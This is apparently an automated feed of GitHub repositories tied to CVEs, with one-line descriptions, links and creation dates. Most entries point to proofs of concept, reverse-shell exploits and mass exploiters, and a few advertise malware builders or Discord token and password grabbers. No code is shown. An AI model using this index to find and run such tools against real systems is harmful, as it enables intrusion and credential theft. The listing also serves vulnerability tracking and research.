**SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.** : [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193) create time: 2023-03-21T08:00:49Z

**no description** : [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963) create time: 2023-03-21T06:14:35Z

**no description** : [nidhi7598/OPENSSL_1.1.11g_G3_CVE-2020-1971](https://github.com/nidhi7598/OPENSSL_1.1.11g_G3_CVE-2020-1971) create time: 2023-03-21T05:13:37Z

**no description** : [Mustafa1986/CVE-2022-22963-Reverse-Shell-Exploit](https://github.com/Mustafa1986/CVE-2022-22963-Reverse-Shell-Exploit) create time: 2023-03-21T05:11:50Z

**no description** : [4bhishek0/CVE-2022-0847](https://github.com/4bhishek0/CVE-2022-0847) create time: 2023-03-16T17:00:31Z

**no description** : [nidhi7598/OPENSSL_1.1.11g_G3_CVE-2023-0286](https://github.com/nidhi7598/OPENSSL_1.1.11g_G3_CVE-2023-0286) create time: 2023-03-21T04:57:37Z

**Windows 11 System Permission Elevation** : [HKxiaoli/Windows_AFD_LPE_CVE-2023-21768](https://github.com/HKxiaoli/Windows_AFD_LPE_CVE-2023-21768) create time: 2023-03-21T01:58:40Z

**CVE-2018-6341** : [diwangs/react16-ssr](https://github.com/diwangs/react16-ssr) create time: 2023-03-20T23:50:29Z

**Repo for CVE-2022-46169** : [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169) create time: 2023-03-20T22:54:18Z

**Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10** : [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715) create time: 2023-03-20T04:31:32Z

**Patch for MS Outlook Critical Vulnerability - CVSS 9.8** : [SecCTechs/CVE-2023-23397](https://github.com/SecCTechs/CVE-2023-23397) create time: 2023-03-20T17:45:37Z

**Simple CVE-2023-23397 poc with sending of the payload by email.** : [Trackflaw/CVE-2023-23397](https://github.com/Trackflaw/CVE-2023-23397) create time: 2023-03-20T16:31:54Z

**VM Escape for Parallels Desktop <18.1.1** : [Impalabs/CVE-2023-27326](https://github.com/Impalabs/CVE-2023-27326) create time: 2023-03-20T11:47:54Z

**this web is vulnerable against CVE-2021-44228** : [github-kyruuu/log4shell-vulnweb](https://github.com/github-kyruuu/log4shell-vulnweb) create time: 2023-03-20T14:09:30Z

**CVE-2020-0796 SMB Ghost vulnerability detection and mitigation** : [heeloo123/CVE-2020-0796](https://github.com/heeloo123/CVE-2020-0796) create time: 2023-03-20T13:00:20Z

**CVE-2021-44228** : [heeloo123/CVE-2021-44228](https://github.com/heeloo123/CVE-2021-44228) create time: 2023-03-20T12:13:13Z

**CVE-2023-23415** : [amitdubey1921/CVE-2023-23416](https://github.com/amitdubey1921/CVE-2023-23416) create time: 2023-03-18T14:49:52Z

**Custom exploit written for enumerating usernames as per CVE-2016-6210** : [goomdan/CVE-2016-6210-exploit](https://github.com/goomdan/CVE-2016-6210-exploit) create time: 2023-03-19T19:16:36Z

**CVE-2023-23192 test** : [Penkyzduyi/CVE-2023-23192](https://github.com/Penkyzduyi/CVE-2023-23192) create time: 2023-03-20T09:59:39Z

**Puni love is** : [Penkyzduyi/CVE-2023-1337](https://github.com/Penkyzduyi/CVE-2023-1337) create time: 2023-03-20T09:57:53Z

**CVE-2023-23192** : [pnsad/CVE-2023-23192](https://github.com/pnsad/CVE-2023-23192) create time: 2023-03-20T08:06:55Z

**CVE-2022-24716 | Arbitrary File Disclosure Icingaweb2** : [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716) create time: 2023-03-20T02:25:55Z

**Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10** : [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716) create time: 2023-03-19T20:41:46Z

**This script exploits a vulnerability (CVE-2021-25094) in the TypeHub WordPress plugin.** : [experimentalcrow1/TypeHub-Exploiter](https://github.com/experimentalcrow1/TypeHub-Exploiter) create time: 2023-03-18T11:26:09Z

**An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.** : [aliestercrowleymv/CVE-2023-23752-Vulnerability-Scanner](https://github.com/aliestercrowleymv/CVE-2023-23752-Vulnerability-Scanner) create time: 2023-03-19T15:30:34Z

**no description** : [luxel-h/Bash-exploit-for-CVE-2022-0739](https://github.com/luxel-h/Bash-exploit-for-CVE-2022-0739) create time: 2023-03-19T11:35:03Z

**no description** : [Liuyushung/CVE-2022-23773-Reproduce](https://github.com/Liuyushung/CVE-2022-23773-Reproduce) create time: 2023-03-19T10:08:47Z

**no description** : [ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook](https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook) create time: 2023-03-19T08:07:58Z

**Discord bot which monitors for and deletes images vulnerable to the Acropalypse exploit (CVE-2023-21036)** : [qixils/anti-acropalypse](https://github.com/qixils/anti-acropalypse) create time: 2023-03-19T02:15:23Z

**no description** : [ziadanbari2021/exploit-CVE-2020-24815.py](https://github.com/ziadanbari2021/exploit-CVE-2020-24815.py) create time: 2023-03-18T21:42:29Z

**no description** : [djackreuter/CVE-2023-23397-PoC](https://github.com/djackreuter/CVE-2023-23397-PoC) create time: 2023-03-18T21:14:21Z

**Curated Hyperlink Aggregator for CVE-2023-23397** : [roughentomologyx/Awesome-CVE-2023-23397](https://github.com/roughentomologyx/Awesome-CVE-2023-23397) create time: 2023-03-18T15:13:49Z

**no description** : [amitdubey1921/CVE-2023-23415](https://github.com/amitdubey1921/CVE-2023-23415) create time: 2023-03-18T14:42:05Z

**This script exploits a vulnerability (CVE-2021-25094) in the TypeHub WordPress plugin.** : [aliestercrowleymv/TypeHub-Exploiter](https://github.com/aliestercrowleymv/TypeHub-Exploiter) create time: 2023-03-18T11:19:33Z

**CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.** : [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit) create time: 2023-03-18T11:43:00Z

**no description** : [LingerANR/CVE-2021-22-555](https://github.com/LingerANR/CVE-2021-22-555) create time: 2023-03-17T19:32:45Z

**Generates meeting requests taking advantage of CVE-2023-23397. This requires the outlook thick client to send.** : [BillSkiCO/CVE-2023-23397_EXPLOIT](https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT) create time: 2023-03-17T17:35:14Z

**no description** : [k4u5h41/CVE-2016-1531](https://github.com/k4u5h41/CVE-2016-1531) create time: 2023-03-17T14:30:15Z

**CVE-2023-23415** : [wh-gov/CVE-2023-23415](https://github.com/wh-gov/CVE-2023-23415) create time: 2023-03-17T12:38:30Z

**Exploit POC for CVE-2023-23397** : [ahmedkhlief/CVE-2023-23397-POC](https://github.com/ahmedkhlief/CVE-2023-23397-POC) create time: 2023-03-17T10:18:26Z

**Scripts and code for "The Secret Life of CVEs", accepted to MSR 2023 Challenge: https://conf.researchr.org/track/msr-2023/msr-2023-mining-challenge** : [ncusi/secret_life_of_CVEs](https://github.com/ncusi/secret_life_of_CVEs) create time: 2023-03-17T10:24:09Z

**PoC for CVE-2023-23397** : [cleverg0d/CVE-2023-23397-PoC-PowerShell](https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell) create time: 2023-03-17T06:52:42Z

**CVE-2023-23397 Remediation Script (Powershell)** : [im007/CVE-2023-23397](https://github.com/im007/CVE-2023-23397) create time: 2023-03-17T03:38:50Z

**no description** : [api0cradle/CVE-2023-23397-POC-Powershell](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell) create time: 2023-03-16T19:43:39Z

**Simple PoC in PowerShell for CVE-2023-23397** : [ka7ana/CVE-2023-23397](https://github.com/ka7ana/CVE-2023-23397) create time: 2023-03-16T19:10:37Z

**Exploit and report for CVE-2023-23396.** : [LucaBarile/CVE-2023-23396](https://github.com/LucaBarile/CVE-2023-23396) create time: 2023-03-16T17:28:27Z

**no description** : [tristao-marinho/CVE-2023-27842](https://github.com/tristao-marinho/CVE-2023-27842) create time: 2023-03-16T15:59:39Z

**no description** : [jason-ntu/CVE-2021-26700](https://github.com/jason-ntu/CVE-2021-26700) create time: 2023-03-16T14:49:28Z

**Python script to create a message with the vulenrability properties set** : [grn-bogo/CVE-2023-23397](https://github.com/grn-bogo/CVE-2023-23397) create time: 2023-03-16T15:00:26Z

**CVE-2023-23397 - Microsoft Outlook Vulnerability** : [alicangnll/CVE-2023-23397](https://github.com/alicangnll/CVE-2023-23397) create time: 2023-03-16T14:07:15Z

**Mass RCE Exploiter for Fortinet(FortiOS/Fortiproxy) CVE-2023-25610** : [l1ced/CVE-2023-25610-mass](https://github.com/l1ced/CVE-2023-25610-mass) create time: 2023-03-16T13:37:47Z

**no description** : [j0eyv/CVE-2023-23397](https://github.com/j0eyv/CVE-2023-23397) create time: 2023-03-16T12:02:04Z

**no description** : [Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032](https://github.com/Trinadh465/external_zlib_AOSP10_r33_CVE-2018-25032) create time: 2023-03-16T09:44:18Z

**Automate JWT Exploit (CVE-2018-0114)** : [amr9k8/jwt-spoof-tool](https://github.com/amr9k8/jwt-spoof-tool) create time: 2023-03-16T09:08:05Z

**no description** : [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978) create time: 2023-03-16T09:34:17Z

**针对(CVE-2023-0179)漏洞利用 该漏洞被分配为CVE-2023-0179,影响了从5.5到6.2-rc3的所有Linux版本,尽管该利用在6.1.6上被测试。 漏洞的细节和文章可以在os-security上找到。** : [H4K6/CVE-2023-0179-PoC](https://github.com/H4K6/CVE-2023-0179-PoC) create time: 2023-03-16T02:20:52Z

**no description** : [0xxtoby/CVE-2023-1415-](https://github.com/0xxtoby/CVE-2023-1415-) create time: 2023-03-15T08:44:59Z

**FortiOS buffer overflow vulnerability** : [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475) create time: 2023-03-16T00:05:30Z

**no description** : [zeverse/CVE-2023-23924-sample](https://github.com/zeverse/CVE-2023-23924-sample) create time: 2023-03-08T01:16:16Z

**Exploit for the CVE-2023-23397** : [sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY](https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY) create time: 2023-03-15T17:03:38Z

**The simple PoC of CVE-2023-27587** : [sec-fx/CVE-2023-27587-PoC](https://github.com/sec-fx/CVE-2023-27587-PoC) create time: 2023-03-15T15:52:20Z

**A convenient and time-saving auto script of building environment and exploit it.** : [iridium-soda/CVE-2019-14271_Exploit](https://github.com/iridium-soda/CVE-2019-14271_Exploit) create time: 2023-03-15T15:13:27Z

**Proof of concept exploit code for CVE-2020-7388, an unauthenticated RCE as SYSTEM on Sage X3's AdxDSrv Service** : [ac3lives/sagex3-cve-2020-7388-poc](https://github.com/ac3lives/sagex3-cve-2020-7388-poc) create time: 2023-03-15T15:09:07Z

**An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address book and domain joined passwords** : [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026) create time: 2023-03-15T14:23:41Z

**Windows Network File System Remote exploit for CVE-2022-30136** : [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136) create time: 2023-03-15T10:59:08Z

**121** : [wallbreak1991/cve-2022-22947](https://github.com/wallbreak1991/cve-2022-22947) create time: 2023-03-15T09:33:46Z

**no description** : [nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-](https://github.com/nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-) create time: 2023-03-15T07:52:05Z

**CVE-2021-33104 - Improper access control in the Intel(R) OFU software** : [rjt-gupta/CVE-2021-33104](https://github.com/rjt-gupta/CVE-2021-33104) create time: 2023-03-15T07:45:02Z

**An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft** : [Sma-Das/Log4j-PoC](https://github.com/Sma-Das/Log4j-PoC) create time: 2023-03-14T18:49:36Z

**Our Developers Our Developer team is highly experienced in various languages and can deliver quality software Exploit JPG fast & reliably. Efficiency is guaranteed.** : [unknown144p/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/unknown144p/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-03-14T16:50:24Z

**Webcam screenshots will be taken if the user is watching something obscene on the Internet.** : [unknown144p/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/unknown144p/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-03-14T16:48:34Z

**POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon** : [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475) create time: 2023-02-23T10:04:58Z

**Batch scanning site.** : [sunyyer/CVE-2020-3187-Scanlist](https://github.com/sunyyer/CVE-2020-3187-Scanlist) create time: 2023-03-14T09:54:38Z

**Implementation of FOLLINA-CVE-2022-30190** : [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190) create time: 2023-03-14T07:00:47Z

**CVE-2023-23752 - Information Disclosure** : [lyuumei/CVE-2023-23752](https://github.com/lyuumei/CVE-2023-23752) create time: 2023-03-14T07:15:55Z

**Windows_AFD_LPE_CVE-2023-21768** : [Malwareman007/CVE-2023-21768](https://github.com/Malwareman007/CVE-2023-21768) create time: 2023-03-13T20:32:50Z

**no description** : [Syd-SydneyJr/CVE-2021-45010](https://github.com/Syd-SydneyJr/CVE-2021-45010) create time: 2023-03-13T18:40:02Z

**CVE-2022-41333** : [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333) create time: 2023-03-10T17:29:09Z

**no description** : [tuannq2299/CVE-2023-23279](https://github.com/tuannq2299/CVE-2023-23279) create time: 2023-03-13T16:39:31Z

**CVE-2022-22963 RCE PoC in python** : [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC) create time: 2023-03-13T13:28:55Z

**A Tool for scanning CVE-2017-9841 with multithread** : [MrG3P5/CVE-2017-9841](https://github.com/MrG3P5/CVE-2017-9841) create time: 2023-03-13T07:42:32Z

**This is poc of CVE-2022-46169 authentication bypass and remote code execution** : [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit) create time: 2023-03-11T19:39:44Z

**Demonstrable Proof of Concept Exploit for Spring4Shell Vulnerability (CVE-2022-22965)** : [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit) create time: 2023-03-12T17:37:51Z

**Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers** : [seifallahhomrani1/CVE-2023-0861-POC](https://github.com/seifallahhomrani1/CVE-2023-0861-POC) create time: 2023-03-12T17:43:00Z

**no description** : [h1bAna/CVE-2017-5123](https://github.com/h1bAna/CVE-2017-5123) create time: 2023-03-11T20:45:15Z

**no description** : [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB) create time: 2023-03-04T09:15:46Z

**Laravel RCE CVE-2021-3129** : [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129) create time: 2023-03-11T15:31:37Z

**Laravel RCE CVE-2021-3129** : [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129) create time: 2023-03-11T15:12:52Z

**An implementation of baton drop (CVE-2022-21894) for armv7 (MSM8960)** : [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7) create time: 2023-03-11T14:38:13Z

**CVE-2023-25610 is an unauthenticated RCE which affects FortiOS and FortiProxy** : [uicres/CVE-2023-25610-PoC](https://github.com/uicres/CVE-2023-25610-PoC) create time: 2023-03-11T11:57:50Z

**python 2.7** : [Jenderal92/Joomla-CVE-2023-23752](https://github.com/Jenderal92/Joomla-CVE-2023-23752) create time: 2023-03-11T11:20:44Z

**CVE-2023-21839工具** : [Firebasky/CVE-2023-21839](https://github.com/Firebasky/CVE-2023-21839) create time: 2023-03-11T08:26:30Z

**PoC made in Python to CVE-2019-6111.** : [Sigmw/CVE-2019-6111-poc](https://github.com/Sigmw/CVE-2019-6111-poc) create time: 2023-03-11T02:49:00Z

**An exploit PoC for CVE-2023-24749, aka PwnAgent** : [mahaloz/netgear-pwnagent](https://github.com/mahaloz/netgear-pwnagent) create time: 2023-02-26T00:16:35Z

**Using CVE-2023-21768 to manual map kernel mode driver** : [SamuelTulach/nullmap](https://github.com/SamuelTulach/nullmap) create time: 2023-03-10T19:08:28Z

**An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.** : [H454NSec/CVE-2023-23752](https://github.com/H454NSec/CVE-2023-23752) create time: 2023-03-10T17:10:14Z

**Tomcat PUT方法任意文件写入(CVE-2017-12615)exp** : [xiaokp7/Tomcat_PUT_EXP](https://github.com/xiaokp7/Tomcat_PUT_EXP) create time: 2023-03-10T16:26:45Z

**Реализация средств повышения привилегий в Linux** : [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995) create time: 2023-03-10T07:05:45Z

**Collection of popular CVEs, PoCs, RCEs scanners** : [poppylarrry/Zero-Days](https://github.com/poppylarrry/Zero-Days) create time: 2023-03-10T09:02:10Z

**no description** : [maldev866/ChExp_CVE_2020_6507](https://github.com/maldev866/ChExp_CVE_2020_6507) create time: 2023-03-10T06:05:56Z

**cve-2023-21768** : [cl4ym0re/cve-2023-21768-compiled](https://github.com/cl4ym0re/cve-2023-21768-compiled) create time: 2023-03-10T03:36:52Z

**Microsoft Word 远程代码执行漏洞** : [CKevens/CVE-2023-21716-POC](https://github.com/CKevens/CVE-2023-21716-POC) create time: 2023-03-10T02:46:32Z

**CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.** : [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986) create time: 2023-03-09T22:03:48Z

**no description** : [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588) create time: 2023-03-09T21:29:56Z

**Windows LPE exploit for CVE-2022-37969** : [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969) create time: 2023-03-09T21:17:44Z

**SSH User Enumerator in Python3, CVE-2018-15473, I updated the code of this exploit (https://www.exploit-db.com/exploits/45939) to work with python3 instead of python2.** : [sergiovks/SSH-User-Enum-Python3-CVE-2018-15473](https://github.com/sergiovks/SSH-User-Enum-Python3-CVE-2018-15473) create time: 2023-03-09T15:23:53Z

**Tenda f3 Malformed HTTP Request Header Processing Vulnerability.** : [H454NSec/CVE-2020-35391](https://github.com/H454NSec/CVE-2020-35391) create time: 2023-03-09T15:36:22Z

**CVE-2019-15107测试程序** : [wenruoya/CVE-2019-15107](https://github.com/wenruoya/CVE-2019-15107) create time: 2023-03-09T14:43:29Z

**no description** : [sei-fish/CVE-2021-22205](https://github.com/sei-fish/CVE-2021-22205) create time: 2023-03-09T11:53:37Z

**Mass Auto Exploit CVE-2022-4395 Unauthenticated Arbitrary File Upload** : [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395) create time: 2023-03-09T12:35:48Z

**Open Web Analytics 1.7.3 - Remote Code Execution** : [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637) create time: 2023-03-09T10:40:24Z

**Bulk scanner + get config from CVE-2023-23752** : [gibran-abdillah/CVE-2023-23752](https://github.com/gibran-abdillah/CVE-2023-23752) create time: 2023-03-09T07:42:03Z

**开源,go多并发批量探测poc,准确率高** : [GhostToKnow/CVE-2023-23752](https://github.com/GhostToKnow/CVE-2023-23752) create time: 2023-03-09T07:32:06Z

**CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发** : [fenasal/CVE-2021-1732](https://github.com/fenasal/CVE-2021-1732) create time: 2023-03-09T07:14:45Z

**Reproduce CVE-2023-22551** : [viswagb/CVE-2023-22551](https://github.com/viswagb/CVE-2023-22551) create time: 2023-03-09T04:47:37Z

**no description** : [cn6u9/cve2023](https://github.com/cn6u9/cve2023) create time: 2023-03-09T01:19:38Z

**CVE-2023-999999** : [zeroc00I/CVE-2023-999999](https://github.com/zeroc00I/CVE-2023-999999) create time: 2023-03-08T22:31:50Z

**CVE-2023-23504** : [zeroc00I/CVE-2023-23504](https://github.com/zeroc00I/CVE-2023-23504) create time: 2023-03-08T22:26:44Z

**Judging Management System v1.0 - Unrestricted File Upload + RCE (Unauthenticated)** : [angelopioamirante/CVE-2023-24317](https://github.com/angelopioamirante/CVE-2023-24317) create time: 2023-03-08T22:00:44Z

**Results of retrohunt for files matching YARA rules from https://github.com/AmgdGocha/Detection-Rules/blob/main/CVE-2023-21716.yar** : [mikesxrs/CVE-2023-21716_YARA_Results](https://github.com/mikesxrs/CVE-2023-21716_YARA_Results) create time: 2023-03-08T18:25:39Z

**LPE exploit for CVE-2023-21768** : [chompie1337/Windows_LPE_AFD_CVE-2023-21768](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768) create time: 2023-03-07T23:00:27Z

**no description** : [maldev866/ChExp_CVE_2021_21224](https://github.com/maldev866/ChExp_CVE_2021_21224) create time: 2023-03-08T11:34:50Z

**no description** : [maldev866/WordExp_CVE_2023_21716](https://github.com/maldev866/WordExp_CVE_2023_21716) create time: 2023-03-08T12:00:59Z

**no description** : [yrtsec/CVE-2023-999995](https://github.com/yrtsec/CVE-2023-999995) create time: 2023-03-08T07:43:16Z

**CVE-2023-123456** : [emotest1/CVE-2023-123456](https://github.com/emotest1/CVE-2023-123456) create time: 2023-03-08T07:15:25Z

**A vulnerability within Microsoft Office's wwlib allows attackers to achieve remote code execution with the privileges of the victim that opens a malicious RTF document. The attacker could deliver this file as an email attachment (or other means).** : [gyaansastra/CVE-2023-21716](https://github.com/gyaansastra/CVE-2023-21716) create time: 2023-03-08T06:20:45Z

**spring cloud function 一键利用工具! by charis 博客http://www.charis3306.top/** : [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963) create time: 2023-03-07T15:57:29Z

**Mass Checker CVE-2023-23752** : [haxor1337x/Mass-Checker-CVE-2023-23752](https://github.com/haxor1337x/Mass-Checker-CVE-2023-23752) create time: 2023-03-07T15:59:37Z

**RTF Crash POC Python 3.11 Windows 10** : [Xnuvers007/CVE-2023-21716](https://github.com/Xnuvers007/CVE-2023-21716) create time: 2023-03-07T15:03:43Z

**no description** : [adriyansyah-mf/CVE-2023-23752](https://github.com/adriyansyah-mf/CVE-2023-23752) create time: 2023-03-07T12:32:17Z

**ChExp_CVE_2020_16040** : [maldev866/ChExp_CVE_2020_16040](https://github.com/maldev866/ChExp_CVE_2020_16040) create time: 2023-03-07T09:45:36Z

**no description** : [FeatherStark/CVE-2023-21716](https://github.com/FeatherStark/CVE-2023-21716) create time: 2023-03-07T09:34:12Z

**no description** : [HaxorSec1945/CVE2023-23752](https://github.com/HaxorSec1945/CVE2023-23752) create time: 2023-03-07T06:38:30Z

**no description** : [rahmadsandy/EXIM-4.87-CVE-2019-10149](https://github.com/rahmadsandy/EXIM-4.87-CVE-2019-10149) create time: 2023-03-07T05:09:08Z

**MOC3ingbird Exploit for Live2D (CVE-2023-27566)** : [OpenL2D/moc3ingbird](https://github.com/OpenL2D/moc3ingbird) create time: 2023-03-03T01:57:28Z

**Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)** : [Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal](https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal) create time: 2023-02-04T03:03:05Z

**short view of ruby on rails properties misconfiguration** : [OmarJAhmad/CVE-2023-23138](https://github.com/OmarJAhmad/CVE-2023-23138) create time: 2023-01-04T12:51:33Z

**A small PoC for the Keycloak vulnerability CVE-2023-0264** : [twwd/CVE-2023-0264](https://github.com/twwd/CVE-2023-0264) create time: 2023-03-06T14:42:19Z

**PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)** : [WinMin/CVE-2021-3560](https://github.com/WinMin/CVE-2021-3560) create time: 2022-04-30T05:53:45Z

**no description** : [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015) create time: 2023-03-06T12:50:43Z

**no description** : [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078) create time: 2023-03-06T12:49:29Z

**no description** : [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015) create time: 2023-03-06T12:34:22Z

**Payload Generator and Detailed Analysis about CVE-2022-35649** : [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649) create time: 2023-03-06T10:09:59Z

**PoC for CVE-2023-22432 (web2py)** : [aeyesec/CVE-2023-22432](https://github.com/aeyesec/CVE-2023-22432) create time: 2023-03-06T04:43:11Z

**Pada bulan maret 2023, terdapat sample baru yang terindentifikasi sebagai malware. Malware tersebut berasal dari file berekstensi.xls dan .doc dan dikenal dengan nama “Bank Slip.xls”. Aktivitas malware tersebut memiliki hubungan dengan kerentanan yang dikenal dengan id CVE-2017-11882 dan CVE-2018-0802.** : [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis) create time: 2023-03-06T03:10:20Z

**Blog Pribadi** : [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638) create time: 2019-02-16T16:50:50Z

**Automatic Mass Tool for checking vulnerability in CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF** : [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker) create time: 2023-03-05T01:46:41Z

**CVE-2022-31814** : [drcayber/RCE](https://github.com/drcayber/RCE) create time: 2023-03-05T00:56:14Z

**Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp** : [ajisai-babu/CVE-2021-3129-exp](https://github.com/ajisai-babu/CVE-2021-3129-exp) create time: 2023-03-04T17:04:38Z

**mass exploiter for draytek vigor (CVE-2022-32548)** : [uicres/draytek-RCE](https://github.com/uicres/draytek-RCE) create time: 2023-03-04T12:44:50Z

**no description** : [cavetownie/CVE-2023-24362](https://github.com/cavetownie/CVE-2023-24362) create time: 2023-01-23T01:10:08Z

**Checker for CVE-2023-26604** : [Zenmovie/CVE-2023-26604](https://github.com/Zenmovie/CVE-2023-26604) create time: 2023-03-03T20:28:33Z

**no description** : [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374) create time: 2023-03-03T18:43:02Z

**Exploit app for CVE-2022-20494, a high severity permanent denial-of-service vulnerability that leverages Android's DND (Do not disturb) feature** : [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494) create time: 2023-03-03T17:54:34Z

**CMS Made Simple < 2.2.10 - SQL Injection** : [STERN3L/CVE-2019-9053](https://github.com/STERN3L/CVE-2019-9053) create time: 2023-02-21T12:34:30Z

**https://medium.com/@anderson_pablo/iptv-smarters-exploit-cve-2020-9380-22d4b21f5da7** : [migueltarga/CVE-2020-9380](https://github.com/migueltarga/CVE-2020-9380) create time: 2020-02-19T02:29:14Z

**This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)** : [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-) create time: 2023-03-03T12:56:58Z

**cve-2023-0050** : [wh-gov/CVE-2023-0050](https://github.com/wh-gov/CVE-2023-0050) create time: 2023-03-03T11:34:46Z

**Initial POC for CVE-2020-7247** : [gatariee/CVE-2020-7247](https://github.com/gatariee/CVE-2020-7247) create time: 2023-03-03T07:21:06Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-20921](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2023-20921) create time: 2023-03-03T05:08:09Z

**XDay** : [deathflash1411/CVE-2023-21839](https://github.com/deathflash1411/CVE-2023-21839) create time: 2023-03-03T04:50:29Z

**no description** : [Cvergara2023/Cvergara2023](https://github.com/Cvergara2023/Cvergara2023) create time: 2023-03-03T00:58:28Z

**The FreeBSD ICMP buffer overflow** : [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093) create time: 2023-03-02T20:18:54Z

**no description** : [mritunjay-k/CVE-2014-6271](https://github.com/mritunjay-k/CVE-2014-6271) create time: 2023-03-02T17:30:03Z

**no description** : [mritunjay-k/CVE-2014-6271](https://github.com/mritunjay-k/CVE-2014-6271) create time: 2023-03-02T17:09:47Z

**Code for veracode blog** : [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC) create time: 2023-03-02T16:33:02Z

**Checker and exploit for Bluekeep CVE-2019-0708 vulnerability** : [davidfortytwo/bluekeep](https://github.com/davidfortytwo/bluekeep) create time: 2023-03-02T12:55:02Z

**CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists** : [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988) create time: 2022-11-23T06:17:02Z

